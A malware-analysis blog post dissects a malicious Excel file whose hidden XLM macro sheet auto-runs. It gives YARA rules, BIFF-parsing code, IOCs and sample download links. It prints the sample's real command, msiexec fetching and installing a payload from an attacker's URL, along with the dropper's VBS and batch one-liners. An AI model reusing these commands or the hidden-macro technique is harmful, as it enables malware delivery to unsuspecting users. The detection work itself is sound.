
Extracting "Sneaky" Excel XLM Macros

In this article, we present our in-depth analysis of a malicious Microsoft Excel document (.xls format, with an embedded XLM macro) that we found in the wild. We show how existing open source tools can be used to carve out interesting artifacts. Along the way, we point out some tool limitations and present our solution for closing the gap. Ultimately, our goal is to orchestrate the carving of as many artifacts as possible, for robust threat detection and prevention.

The sample we’ll dive into originally popped up on our radar a few weeks ago, just around the new year. We received it through one of our VirusTotal Intelligence YARA hunt rules that search for suspicious Microsoft Office documents. The initial sample and some relevant reports:

  • SHA256: 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
  • Multi-AV: VirusTotal
  • Sandbox detonation: Hybrid-Analysis
  • Downloadable Samples

Initial AV detection was rather low (3/59); we’ll see why when we dive into the analysis. As of this blog’s publication, 30 days have passed and the file has been rescanned 6 times, with 9 out of 59 engines now successfully detecting the threat.

A Cursory Glance

First, we open the XLS file with Microsoft Excel in a virtual environment to see what it looks like to an end-user. This Excel file contains a single spreadsheet, and the spreadsheet contains a single image that instructs the reader to click “Enable content” in order to view/edit the document (Fig 1); this is a common social engineering attempt to entice the user into allowing execution of the first stage of the malware payload:

Fig 1. Enticing users to activate the first stage of the malware. We detect this and similar lures through Optical Character Recognition (OCR).

Note that the social engineering component of this document lure is enough on its own to trigger InQuest threat prevention, in this particular case through the Optical Character Recognition (OCR) layer of our Deep File Inspection® (DFI) stack.

Let’s use the popular oledump and olevba Python scripts to examine whether the XLS file contains any VBA macros:

$ olevba3 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
olevba3 0.53.1 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:-------- 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
===============================================================================
FILE: 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
Type: OLE
No VBA macros found.

$ oledump.py 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
  1:      4096 '\x05DocumentSummaryInformation'
  2:      4096 '\x05SummaryInformation'
  3:    173064 'Workbook'

According to both tools, the document doesn’t appear to contain any VBA macros. Note that oledump can leverage an additional plugin to dive deeper into the file; more on this later. To investigate the file further, we’ll enlist SSView, a Windows GUI viewer for structured storage, and a hex editor, in this case Hexinator.

A Deeper Dive

XLS is a Compound Document File (CDF or CF) or Object Linking and Embedding (OLE) File; thus, it can be explored with any OLE/CF viewer such as SSView. OLE files are hierarchical data structures consisting of several storages and streams, analogous to folders and files on your standard file system. Fig 2 shows the structure of this particular XLS file in SSView. In this file, the Workbook stream is interesting as it contains all the information related to this workbook such as the included sheets. The structure of this stream is fully specified in Microsoft Office Excel 97-2007 – Binary File Format Specification. We dump the Workbook stream to the filesystem by right-clicking on its name and then selecting “Save stream …”.

Fig 2. Using SSView to explore the XLS file’s storages and streams.

Note that we can also use 7zip to extract all storages and streams from an OLE compound file. 7zip creates a folder and a file for each relevant storage and stream parsed out of the compound file. We pull the extracted Workbook stream into our hex editor, and can spot a cmd.exe pivot at offset 0x028ABB as depicted in Fig 3.

Fig 3. Spotting the embedded cmd.exe pivot in the extracted Workbook stream.

Why the pivot through msiexec.exe? It’s one of a myriad of “Living off the Land” (LOL) techniques that attackers employ to mask their activity from runtime endpoint security monitoring tools. For a well-maintained list of LOL binaries and libraries, see the LOLBAS project, which has a section dedicated to msiexec. The serf=19 bit is interesting; see the relevant documentation in the MSDN article for Custom Action Type 19. This makes for a good hunt rule on its own. We’re looking for serf=19 specifically, or for the combination of msiexec, any other serf= value, and an http URL prefix:

// see: https://github.com/InQuest/yara-rules/
rule MSIExec_Pivot
{
    strings:
        $serf19   = "serf=19" nocase ascii wide
        $msiserf1 = "msiexec" nocase ascii wide
        $msiserf2 = "serf="   nocase ascii wide
        $msiserf3 = "http"    nocase ascii wide
    condition:
        $serf19 or all of ($msiserf*)
}
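
For readers who want to test the same condition outside of YARA, the following is a minimal Python sketch of the rule's logic, not a replacement for it. The function names `_contains` and `msiexec_pivot` are hypothetical, and the sketch assumes that YARA's `wide` modifier can be approximated by searching for the UTF-16LE encoding of each ASCII string.

```python
def _contains(data: bytes, needle: str) -> bool:
    """Case-insensitive search for needle as ASCII or as UTF-16LE ("wide")."""
    haystack = data.lower()  # bytes.lower() only touches ASCII letters
    narrow = needle.lower().encode("ascii")
    wide = needle.lower().encode("utf-16-le")
    return narrow in haystack or wide in haystack


def msiexec_pivot(data: bytes) -> bool:
    """Mirror of the rule condition: $serf19 or all of ($msiserf*)."""
    if _contains(data, "serf=19"):
        return True
    return all(_contains(data, s) for s in ("msiexec", "serf=", "http"))
```

Calling `msiexec_pivot()` on the raw bytes of a file, or of an extracted Workbook stream, returns `True` under the same conditions the rule above describes.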

Before shifting focus to the actual MSI file that msiexec pivots to, let’s take a brief look at the domain office365advance[.]com. It was registered only a few days before the sample in question was first seen on VirusTotal. The resolving IP address geolocates to Russia and appears to host another domain as well:

Domain                  IP            Registration Date  Location
office365advance[.]com  185.68.93.84  12/26/2018         Russia
krontvhouse[.]com       185.68.93.84  2014               Russia

Further pivots can be made to uncover other related infrastructure; we leave this as an exercise for the reader and next examine the MSI installer retrieved from this domain. The MSI file has a SHA256 hash of a5bc8c8b89177f961aa5c0413716cb94b753efbea1a1ec9061be53b1be5cd36a and was initially uploaded to VirusTotal on the same day that office365advance[.]com was registered. Initial detection was a meager 2 engines; today, 36 AV vendors properly detect this file as malicious. A simple string analysis of the MSI reveals the URL www.exetomsi.com, a site that offers a free tool for converting executable files (.exe) to MSI installers. This turns out to be a valuable hunting rule as well. We’ve been watching the results for a while, and plenty of other malware authors are converting their payloads to MSI using this tool:

// see: https://github.com/InQuest/yara-rules/
rule Executable_Converted_to_MSI
{
    strings:
        $magic = /^\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00/
        $url   = "www.exetomsi.com" nocase
    condition:
        $magic at 0 and $url
}

Obviously, this string is easily bleached, and thus this signature is easily evaded. More carefully selected heuristics will provide a more robust hunt rule, again left as an exercise for the reader.

The MSI file in turn contains a malicious binary (c354467ec5d323fecf94d33bc05eab65f90a916c39137d2b751b0e637ca5a3e4). Upon execution, it drops a VBS script (rds.vb, 8a5041d41c552c5df95e4a18de4c343e5ac54845e275262e99a3a6e1a639f5d4), a batch file (help.bat, 91237a76e43caa35e3fbd42d47fbaca5d6b5ea7a96c89341196d070b628122ce), and a Windows DLL (htpd.dat, 79a56ca8a7fdeed1f09466af66c24ddef5ef97ac026297f4ea32db6e01a81190). The VBS script simply executes the dropped help.bat file via a WScript.Shell pivot:

# RDS.VB
CreateObject("WScript.shell").run "cmd /c %temp%\help.bat", 0, False

The executed batch file in turn pivots to the dropped DLL by way of rundll32.exe. Note the entry point of the DLL here is bogus():

# HELP.BAT
rundll32.exe C:\Users\ZGSPBU~1\AppData\Local\Temp\htpd.dat, bogus

The DLL was also uploaded to VirusTotal on 12/26/18, the date of the domain registration. Initial detection was at 4, whereas today the majority of AV engines (46) successfully detect the DLL as malicious. Unfortunately, this is the end of the line for our investigation. As of the time of research, htpd.dat:bogus() attempts to retrieve a next-stage payload from two servers, one unreachable and the other unregistered. We’ve made public a Joe Sandbox Detonation Report for your perusal.

Within that report we can see two possible domains for next-stage retrieval:

URL                                       Status
hxxps://vesecase[.]com/support/form.php   Offline
hxxps://afsssdrfrm[.]pw/support/form.php  Unregistered

Peering back into the history of the registered but currently offline domain, we can see that as of 12/20/2018 vesecase[.]com was hosting a default Apache Ubuntu install page.

Macroless Command Execution?

What of the original pivot though? How does the Excel malware lure transition from the user’s enabling of active content, to the cmd.exe / msiexec combination? It turns out the active content resides within an XLM macro, an age old technology that is giving AV some grief as of late. These kinds of techniques appear from time to time. Collating documents through capture (data-in-motion) and aggregation (data-at-rest) into the InQuest platform empowered by Deep File Inspection (DFI) provides threat hunting teams with an analysis tool to discover previously undiscovered and targeted threats… just like this.

To discover the answer, we’ll take an even deeper look at the Workbook stream, which is in the BIFF8 format. First, we’ll take an interactive look with the Windows tool BIFFView++. As depicted in Figs 4 and 5, the msiexec command is found within a Cell Formula (6h) record. That record is contained within the very first cell of the spreadsheet, A1 (column ‘A’, row ‘1’).

Fig 4. Determining the type of record that encompasses the malicious msiexec command.
Fig 5. Structure of a Cell Formula (6h) record (ref 1)

Now, we need to determine the sheet that contains this particular cell formula. According to the XLM Spec, all information about a sheet, such as its name, type, and stream position, is kept within a BOUNDSHEET record (85h). In Fig 6 we can see that this workbook has two BOUNDSHEET records, which means it has two sheets. However, one of them must be hidden, as we can only see one sheet in Fig 1.

Fig 6. BOUNDSHEET records in this Workbook; representing two sheets.
Fig 7. Option flags in BOUNDSHEET record (this field starts at offset 8 and is two bytes; marked as green and blue in Fig 6)

The first sheet starts at offset 0x028938 and the second at offset 0x028C17. The cell formula that we are interested in is located at 0x028ABB, between the two, so the cell belongs to the first sheet, which is a hidden macro sheet. We can unhide the sheet either by setting the hidden state to zero within the file or by toggling the setting through the Excel interface. It is interesting to note that the hidden state can also be set to 2, which is called the very hidden state. Very hidden sheets cannot be unhidden through the Excel interface; they can only be toggled to visible via manual hex editing of the file. After unhiding the macro sheet, we can see the embedded macro clearly in the Excel GUI.
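
The manual lookup above can also be sketched in a few lines of Python. This is an illustrative sketch rather than the tooling we used. It assumes the Workbook stream has already been extracted to bytes, that every BIFF8 record is a 2-byte type and a 2-byte length (both little-endian) followed by the payload, and that a BOUNDSHEET payload begins with a 4-byte sheet offset, a 1-byte hidden state, and a 1-byte sheet type. The names `iter_records`, `list_sheets`, and `sheet_containing` are hypothetical.

```python
import struct
from bisect import bisect_right

BOUNDSHEET = 0x0085
HIDDEN_STATES = {0: "visible", 1: "hidden", 2: "very hidden"}
SHEET_TYPES = {0: "worksheet", 1: "macro sheet", 2: "chart", 6: "VBA module"}


def iter_records(stream: bytes):
    """Yield (offset, record_type, payload) for each BIFF record in the stream."""
    pos = 0
    while pos + 4 <= len(stream):
        rec_type, size = struct.unpack_from("<HH", stream, pos)
        yield pos, rec_type, stream[pos + 4 : pos + 4 + size]
        pos += 4 + size


def list_sheets(stream: bytes):
    """Return (start_offset, visibility, sheet_type) for every BOUNDSHEET record."""
    sheets = []
    for _, rec_type, payload in iter_records(stream):
        if rec_type == BOUNDSHEET and len(payload) >= 6:
            start, state, kind = struct.unpack_from("<IBB", payload, 0)
            sheets.append((start,
                           HIDDEN_STATES.get(state & 0x03, "unknown"),
                           SHEET_TYPES.get(kind, "unknown")))
    return sheets


def sheet_containing(sheets, offset: int):
    """Return the sheet whose substream starts closest at or before `offset`."""
    ordered = sorted(sheets)
    idx = bisect_right([s[0] for s in ordered], offset) - 1
    return ordered[idx] if idx >= 0 else None
```

Given the extracted Workbook stream in a variable such as `workbook_bytes` (a hypothetical name), `sheet_containing(list_sheets(workbook_bytes), 0x028ABB)` performs the same comparison we did by hand against the two sheet offsets.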

Fig 8. Macro sheet containing malicious Cell Formula pivot.

This formula is triggered when the document is opened (the Auto_Open label points to cell A1): the user is asked to enable active content, and then the cmd.exe/msiexec pivot and the subsequent chain of events execute automatically. As mentioned earlier, XLM 4.0 macros are an arcane technology that predates even VBA (which was introduced in Excel 5.0).

We’re afforded yet another hunting opportunity here. The following YARA rule will detect Excel files with either hidden or very hidden macro sheets. Please note that not all Excel files with hidden macro sheets are malicious.

// see: https://github.com/InQuest/yara-rules/
rule Excel_Hidden_Macro_Sheet
{
    strings:
        $ole_marker     = {D0 CF 11 E0 A1 B1 1A E1}
        $macro_sheet_h1 = {85 00 ?? ?? ?? ?? ?? ?? 01 01}
        $macro_sheet_h2 = {85 00 ?? ?? ?? ?? ?? ?? 02 01}
    condition:
        $ole_marker at 0 and 1 of ($macro_sheet_h*)
}

To programmatically extract XLM macros from an Excel Workbook, we can lean on the BIFF plugin that is bundled with @DidierStevens’ oledump tool. This plugin recognizes a number of functions such as EXEC, REGISTER, and HALT. First, let’s explore the BIFF objects by count:

# BIFF dump, sorted by record type popularity, with partial annotations.
$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526  | tr -s ' '  | cut -d' ' -f4 | sort | uniq -c | sort -nr
     63 XF   # Extended Format 5.115
     47 STYLEEXT
     47 STYLE
     42 ROW
     41 XFEXT
     40 MULBLANK
     20 FORMAT
     17 CONTINUE  # record code=3C00XXXX (typically 3C002020 for record size)
      3 EOF
      3 DBCELL
      3 BOF
      2 WSBOOL
      2 WINDOW2
      2 VCENTER
      2 TOPMARGIN
      2 SETUP
      2 SELECTION
      2 SAVERECALC
      2 RIGHTMARGIN
      2 REFMODE
      2 PRINTHEADERS
      2 PRINTGRIDLINES
      2 PLV
      2 MSODRAWINGGROUP    # code=eb002020 this is where your images are.
      2 MSODRAWING         # related
      2 LEFTMARGIN
      2 ITERATION
      2 INDEX
      2 HEADERFOOTER
      2 HEADER
      2 HCENTER
      2 GUTS
      2 GRIDSET
      2 FORMULA           # EXEC, HALT, etc. the macro content
      2 FOOTER
      2 FEATHEADR
      2 DIMENSIONS
      2 DELTA
      2 DEFCOLWIDTH
      2 DEFAULTROWHEIGHT
      2 COLINFO
      2 CALCMODE
      2 CALCCOUNT
      2 BOUNDSHEET        # Spreadsheets
      2 BOTTOMMARGIN
      1 plugin
      1 XFCRC
      1 WRITEACCESS
      1 WINDOWPROTECT
      1 WINDOW1
      1 USESELFS
      1 THEME
      1 TABLESTYLES
      1 TABID
      1 SUPBOOK
      1 SST
      1 REFRESHALL
      1 RECALCID
      1 PROTECT
      1 PROT4REVPASS
      1 PROT4REV
      1 PRECISION
      1 PLS
      1 PASSWORD
      1 OBJ
      1 MTRSETTINGS
      1 MMS
      1 MERGECELLS
      1 LABEL            # This record represents a cell that contains a string.
      1 INTERFACEHDR
      1 INTERFACEEND
      1 HIDEOBJ
      1 HFPicture
      1 FORCEFULLCALCULATION
      1 FNGROUPCOUNT
      1 EXTSST
      1 EXTERNSHEET
      1 EXCEL9FILE
      1 DSF
      1 COUNTRY
      1 COMPRESSPICTURES
      1 COMPAT12
      1 CODEPAGE
      1 BOOKEXT
      1 BOOKBOOL
      1 BACKUP
      1 1904

If you’re looking for “interesting” records, start by grepping for “sheet”, “label”, and “formula”. Let’s look for the Auto_Open label and dump it, then find the cmd/msiexec combination:

$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-o label -s"
  1:      4096 '\x05DocumentSummaryInformation'
  2:      4096 '\x05SummaryInformation'
  3:    173064 'Workbook'
               Plugin: BIFF plugin
                 '0018     31 LABEL : Cell Value, String Constant - \x00Auto_Ope'
                  ASCII:
                   Auto_Open:
                 002a      2 PRINTHEADERS : Print Row/Column Labels
                 002a      2 PRINTHEADERS : Print Row/Column Labels

$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-o formula"
  1:      4096 '\x05DocumentSummaryInformation'
  2:      4096 '\x05SummaryInformation'
  3:    173064 'Workbook'
               Plugin: BIFF plugin
                 0160      2 USESELFS : Natural Language Formulas Flag
                 '0006    129 FORMULA : Cell Formula - R1C1 107 ptgStr "msiexec.exe serf=19 skip=1 /i http://office365advance.com/update /q OnStart='c:\windows\notepad.exe'" ptgFuncVarV args 1 func 006e (EXEC) '
                 0006     26 FORMULA : Cell Formula - R2C1 4 ptgFuncVarV args 0 func 0036 (HALT)
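
To make the plugin output above less of a black box, here is a minimal Python sketch that decodes the two token types seen in this sample. It is not the plugin's implementation. It assumes a BIFF8 FORMULA payload of 20 fixed bytes (row, column, format index, cached result, flags, and a reserved field), a 2-byte expression length, and then the tokens. Only ptgStr (17h) and ptgFuncVarV (42h) are handled, and the function table is deliberately limited to the two functions shown above. The names `decode_simple_formula` and `find_exec_commands` are hypothetical.

```python
import struct

FORMULA = 0x0006
PTG_STR = 0x17
PTG_FUNC_VAR_V = 0x42
XLM_FUNCS = {0x0036: "HALT", 0x006E: "EXEC"}  # only the two seen in this sample


def iter_records(stream: bytes):
    """Yield (offset, record_type, payload) for each BIFF record in the stream."""
    pos = 0
    while pos + 4 <= len(stream):
        rec_type, size = struct.unpack_from("<HH", stream, pos)
        yield pos, rec_type, stream[pos + 4 : pos + 4 + size]
        pos += 4 + size


def decode_simple_formula(payload: bytes):
    """Return (row, col, tokens), 1-based like R1C1; expects len(payload) >= 22."""
    row, col = struct.unpack_from("<HH", payload, 0)
    (expr_len,) = struct.unpack_from("<H", payload, 20)
    expr = payload[22 : 22 + expr_len]
    tokens, pos = [], 0
    while pos < len(expr):
        ptg = expr[pos]
        if ptg == PTG_STR and pos + 3 <= len(expr):
            count, flags = expr[pos + 1], expr[pos + 2]
            width = 2 if flags & 0x01 else 1  # bit 0 set: 16-bit characters
            raw = expr[pos + 3 : pos + 3 + count * width]
            codec = "utf-16-le" if width == 2 else "latin-1"
            tokens.append(("str", raw.decode(codec, errors="replace")))
            pos += 3 + count * width
        elif ptg == PTG_FUNC_VAR_V and pos + 4 <= len(expr):
            argc = expr[pos + 1] & 0x7F
            (func,) = struct.unpack_from("<H", expr, pos + 2)
            func &= 0x7FFF
            tokens.append(("call", XLM_FUNCS.get(func, hex(func)), argc))
            pos += 4
        else:
            tokens.append(("unknown", hex(ptg)))
            break  # stop at the first token this sketch does not understand
    return row + 1, col + 1, tokens


def find_exec_commands(stream: bytes):
    """Return (record_offset, row, col, string) for formulas that call EXEC."""
    hits = []
    for offset, rec_type, payload in iter_records(stream):
        if rec_type != FORMULA or len(payload) < 22:
            continue
        row, col, tokens = decode_simple_formula(payload)
        if any(t[0] == "call" and t[1] == "EXEC" for t in tokens):
            hits.extend((offset, row, col, t[1]) for t in tokens if t[0] == "str")
    return hits
```

The layout assumption agrees with the listing above: the 129-byte FORMULA record at R1C1 is 22 bytes of header plus the 107-byte expression that the plugin reports. Formulas that use other token types are reported as unknown rather than decoded.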

Next, let’s take a look at how one could programmatically carve the image component out of the document lure.

Carving Images from XLM

As mentioned in the beginning, our aim is to carve as much as possible from this file. Thus, we are also interested in extracting the image embedded in this document. This is a precursor to extracting the semantic meaning through Optical Character Recognition (OCR). Common choices to accomplish this task generically include forensic tools such as foremost and scalpel. We’ll show an example of using scalpel here. However, neither provides a copy with the same fidelity as what is originally displayed upon opening the Excel document in a virtual machine:

# applicable scalpel rules:
#    GIF and JPG files (very common)
#        gif     y       5000000         \x47\x49\x46\x38\x37\x61        \x00\x3b
#        gif     y       5000000         \x47\x49\x46\x38\x39\x61        \x00\x00\x3b
#        jpg     y       200000000       \xff\xd8\xff\xe0\x00\x10        \xff\xd9
#        jpg     y       200000000       \xff\xd8\xff\xe1                \xff\xd9

$ scalpel -c /etc/scalpel.conf 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526/workbook

Fig. 9 shows the output of the carved file by scalpel in the default image viewer on Windows 10.

Fig. 9: Corrupted JPEG file extracted from the XLM file by scalpel.

Why is the file corrupted? Within the XLS/BIFF8 format, records have a maximum size of 8,228 bytes. If the data is larger than what fits in a single record, it must be split into chunks. The first chunk is put in the first record, and the remaining chunks are placed in subsequent CONTINUE (3Ch) records. A generic carver copies the record headers that sit between those chunks straight into the image, which corrupts it. To successfully extract images from XLM files, one needs to strip these CONTINUE headers from the extracted image. To accomplish this task automatically, we’ve extended the oledump BIFF plugin (plugin_biff.py) to include a new command line switch for extracting images. You can find our patch in our GitHub repository (lines 570 to 603):

https://github.com/InQuest/DidierStevensSuite/blob/BIFF-Image-Dump-Switch/plugin_biff.py#L570-L592

Here it is in action:

$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-h"
Usage: oledump.py [options]

Options:
  -h, --help            show this help message and exit
  -e, --extract         Extract images
  -s, --strings         Dump strings
  -a, --hexascii        Dump hex ascii
  -o OPCODE, --opcode=OPCODE
                        Opcode to filter for
  -f FIND, --find=FIND  Content to search for

$ oledump.py -p plugin_biff 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526 --pluginoptions "-e"
  1:      4096 '\x05DocumentSummaryInformation'
  2:      4096 '\x05SummaryInformation'
  3:    173064 'Workbook'
               Plugin: BIFF plugin
                 00003255 0866    126 HFPicture : Header / Footer Picture
                 00005279 00eb   8224 MSODRAWINGGROUP : Microsoft Office Drawing Group
                            [EB] image + 8107 = 8107 bytes
                 0000729d 00eb   8224 MSODRAWINGGROUP : Microsoft Office Drawing Group
                            [EB] image + 8224 = 16331 bytes
                 000092c1 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 24555 bytes
                 0000b2e5 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 32779 bytes
                 0000d309 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 41003 bytes
                 0000f32d 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 49227 bytes
                 00011351 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 57451 bytes
                 00013375 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 65675 bytes
                 00015399 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 73899 bytes
                 000173bd 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 82123 bytes
                 000193e1 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 90347 bytes
                 0001b405 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 98571 bytes
                 0001d429 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 106795 bytes
                 0001f44d 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 115019 bytes
                 00021471 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 123243 bytes
                 00023495 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 131467 bytes
                 000254b9 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 139691 bytes
                 000274dd 003c   8224 CONTINUE : Continues Long Records
                            [3C] image + 8224 = 147915 bytes
                 00027c6f 003c   1934 CONTINUE : Continues Long Records
                            [3C] image + 1934 = 149849 bytes
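
The idea behind the header stripping can be sketched independently of the plugin. The following Python is a simplified illustration, not the patch linked above. It assumes the image data lives in consecutive MSODRAWINGGROUP (EBh) records followed by CONTINUE (3Ch) records, as in the listing above, and that the embedded image is a JPEG that can be located by its start and end markers once the payloads are joined. The names `reassemble_drawing_group` and `carve_jpeg` are hypothetical.

```python
import struct

MSODRAWINGGROUP = 0x00EB
CONTINUE = 0x003C
JPEG_SOI = b"\xff\xd8\xff"  # start-of-image marker plus the next marker prefix
JPEG_EOI = b"\xff\xd9"      # end-of-image marker


def iter_records(stream: bytes):
    """Yield (offset, record_type, payload) for each BIFF record in the stream."""
    pos = 0
    while pos + 4 <= len(stream):
        rec_type, size = struct.unpack_from("<HH", stream, pos)
        yield pos, rec_type, stream[pos + 4 : pos + 4 + size]
        pos += 4 + size


def reassemble_drawing_group(stream: bytes) -> bytes:
    """Join MSODRAWINGGROUP payloads with the CONTINUE payloads that follow them."""
    chunks, collecting = [], False
    for _, rec_type, payload in iter_records(stream):
        if rec_type == MSODRAWINGGROUP:
            collecting = True
            chunks.append(payload)
        elif rec_type == CONTINUE and collecting:
            chunks.append(payload)
        elif collecting:
            break  # the first unrelated record ends the drawing group data
    return b"".join(chunks)


def carve_jpeg(blob: bytes):
    """Return the bytes from the first JPEG start marker to the last end marker."""
    start = blob.find(JPEG_SOI)
    end = blob.rfind(JPEG_EOI)
    if start == -1 or end < start:
        return None
    return blob[start : end + len(JPEG_EOI)]
```

Running `carve_jpeg()` over the raw Workbook stream reproduces the corruption seen with scalpel, because the 4-byte record headers stay embedded in the result. Running it over the output of `reassemble_drawing_group()` avoids that. Other embedded image formats would need their own markers.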

Conclusion

In this article, we analyzed a stealthy malicious Excel document that relies on XLM macros, an age-old technology superseded by VBA, to run embedded commands. We showed in detail how such macros can be located in XLM binary files and how to carve out other useful information such as image files. Last but not least, we presented three YARA rules that can be used to capture malware instances that use similar techniques.

If you’re interested in a similar sample, take a look at:

  • VT: 6f807662e04b5cfb85bc892e27a29994ddcf78e7c3311581753761fede3d5bd1
  • Pivot: add3565office[.]com/rstr
  • Final: pointsoft[.]pw

Malware Samples (All Stages)

Note: The following contains links to actual malware. Although the files carry no file extensions, care should be taken. Not everyone has access to VirusTotal, and we want to ensure that samples are freely available for all researchers to improve their tradecraft.

Stage  Parent Process  File Type  Name      SHA256…    Download
1      EXCEL           XLS        -         98e4695e…  download
2      MSIEXEC         MSI        -         a5bc8c8b…  download
3      MSIEXEC         EXE        -         c354467e…  download
4      WSCRIPT         VBS        rds.vbs   8a5041d4…  download
5      CMD             BAT        help.bat  91237a76…  download
6      RUNDLL32        DLL        htpd.dat  79a56ca8…  download

YARA Hunting Rules

The YARA rules we defined inline above are available, along with other YARA rules we wish to share with the community. These rules should not be considered production appropriate. Rather, they are valuable for research and hunting purposes:

Other YARA rules that we’ve open-sourced can be found at https://github.com/InQuest/yara-rules/. Additionally, we maintain a curated list of awesome YARA rules, tools, and people over at: https://github.com/InQuest/awesome-yara/.

References

IOCs

  • 98e4695eb06b12221f09956c4ee465ca5b50f20c0a5dc0550cad02d1d7131526
  • a5bc8c8b89177f961aa5c0413716cb94b753efbea1a1ec9061be53b1be5cd36a
  • c354467ec5d323fecf94d33bc05eab65f90a916c39137d2b751b0e637ca5a3e4
  • 8a5041d41c552c5df95e4a18de4c343e5ac54845e275262e99a3a6e1a639f5d4
  • 91237a76e43caa35e3fbd42d47fbaca5d6b5ea7a96c89341196d070b628122ce
  • 79a56ca8a7fdeed1f09466af66c24ddef5ef97ac026297f4ea32db6e01a81190
  • office365advance[.]com
  • hxxp://office365advance[.]com/update
  • krontvhouse[.]com
  • 185.68.93.84
  • vesecase[.]com
  • hxxps://vesecase[.]com/support/form.php
  • afsssdrfrm[.]pw
  • hxxps://afsssdrfrm[.]pw/support/form.php
  • add3565office[.]com
  • add3565office[.]com/rstr
  • pointsoft[.]pw
